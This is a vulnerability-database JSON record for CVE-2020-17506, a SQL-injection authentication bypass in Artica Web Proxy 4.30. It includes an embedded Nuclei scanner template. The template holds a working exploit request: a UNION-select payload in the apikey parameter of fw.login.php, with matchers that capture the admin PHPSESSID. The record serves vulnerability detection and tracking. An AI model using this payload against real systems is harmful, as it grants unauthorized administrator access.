{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2020-17506/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2020-17506/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2020-17506/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2020-17506/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2020-17506/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2020-17506"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2020-17506"
    }
  },
  "enrichments": {
    "cisa-kev": {
      "kev": false
    },
    "epss": {
      "epss": 0.93967,
      "kev": false,
      "percentile": 0.99842
    },
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2020/CVE-2020-17506.yaml",
      "nuclei_template_severity": "critical",
      "nuclei_template_yaml": "id: CVE-2020-17506\n\ninfo:\n  name: Artica Web Proxy 4.30 - Authentication Bypass/SQL Injection\n  author: dwisiswant0\n  severity: critical\n  description: Artica Web Proxy 4.30.00000000 allows remote attacker to bypass privilege detection and gain web backend administrator privileges through SQL injection of the apikey parameter in fw.login.php.\n  impact: |\n    Successful exploitation of this vulnerability could allow an attacker to bypass authentication and execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.\n  remediation: |\n    Upgrade to a patched version of Artica Web Proxy or apply the vendor-supplied patch to mitigate this vulnerability.\n  reference:\n    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17506\n    - http://packetstormsecurity.com/files/158868/Artica-Proxy-4.3.0-Authentication-Bypass.html\n    - https://blog.max0x4141.com/post/artica_proxy/\n    - https://github.com/hangmansROP/proof-of-concepts\n    - https://github.com/merlinepedra/nuclei-templates\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2020-17506\n    cwe-id: CWE-89\n    epss-score: 0.93967\n    epss-percentile: 0.99842\n    cpe: cpe:2.3:a:articatech:web_proxy:4.30.000000:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: articatech\n    product: web_proxy\n  tags: cve,cve2020,artica,proxy,packetstorm,articatech,sqli,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;\"\n\n    host-redirects: true\n    max-redirects: 1\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        words:\n          - \"artica-applianc\"\n\n      - type: word\n        part: header\n        words:\n          - \"PHPSESSID\"\n\n      - type: status\n        status:\n          - 200\n          - 301\n          - 302\n        condition: or\n\n    extractors:\n      - type: kval\n        kval:\n          - \"PHPSESSID\"\n# digest: 4a0a00473045022100a90427d7832e099d45c65b602abd4edcc83aa778c6954c00ef2480a50340c0de0220637ade3a63b818d7c22c14c62b2a3b57ea8f35204b482ef9889507c82fb90d15:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2020-17506"
}